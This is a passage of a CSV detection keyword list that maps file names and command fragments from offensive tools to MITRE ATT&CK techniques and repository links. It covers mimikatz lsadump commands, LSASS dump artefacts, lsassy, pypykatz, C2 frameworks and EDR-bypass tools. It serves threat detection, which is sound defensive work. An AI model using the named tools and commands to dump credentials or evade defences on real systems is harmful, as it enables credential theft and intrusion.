movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*loot_memory.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*LordNoteworthy*,offensive_tool_keyword,Github Username,Github username of hacker known for malware pocs and windows exploitations,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/LordNoteworthy,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lotus2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Lovely-Potato*,offensive_tool_keyword,Lovely-Potato,Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM,T1055 - T1547.002 - T1543.003 - T1059.001,TA0004 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/TsukiCTF/Lovely-Potato,1,0,N/A,N/A,2,131,29,2021-07-21T18:09:14Z,2019-05-17T19:37:20Z -*lsa_decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsa_decryptor_nt*.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsa_secrets.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*lsadump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*lsadump::*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::backupkeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::cache*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::changentlm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::dcshadow*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::dcsync*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::lsa*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::mbc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::netsync*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::packages*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::postzerologon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::RpData*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::sam*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::secrets*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::setntlm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsadump::zerologon*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*lsarpc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*LSASecretDefaultPassword*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*lsasecrets.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*lsass comsvcs*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*lsass direct*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Lsass Dump File Created*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,0,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*lsass dump from agent*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*LSASS dump might fail if RunAsPPL is enabled*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*lsass.dmp*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lsass.dmp*,offensive_tool_keyword,lsass,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,N/A,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*lsass.dmp*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*lsass.exe*.dmp*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,0,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*lsass.exe*C:\temp\tmp.tmp*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*lsass_*.dmp*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*lsass_dump_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsass_dump_lsassy_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lsassdump.dmp*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*LsassDump_20*.ps1*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*lsassdumps*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Lsass-Mdump*,signature_keyword,Antivirus Signature,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,lsass dump malware signature,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LSASSProtectionBypass*/,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*LsassSilentProcessExit.cpp*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*LsassSilentProcessExit.exe*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*LsassSilentProcessExit.vcxproj*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*LsassSilentProcessExit-master*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*lsassy *,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy -*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*lsassy -v -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lsassy.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*lsassy/dumpmethod*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - 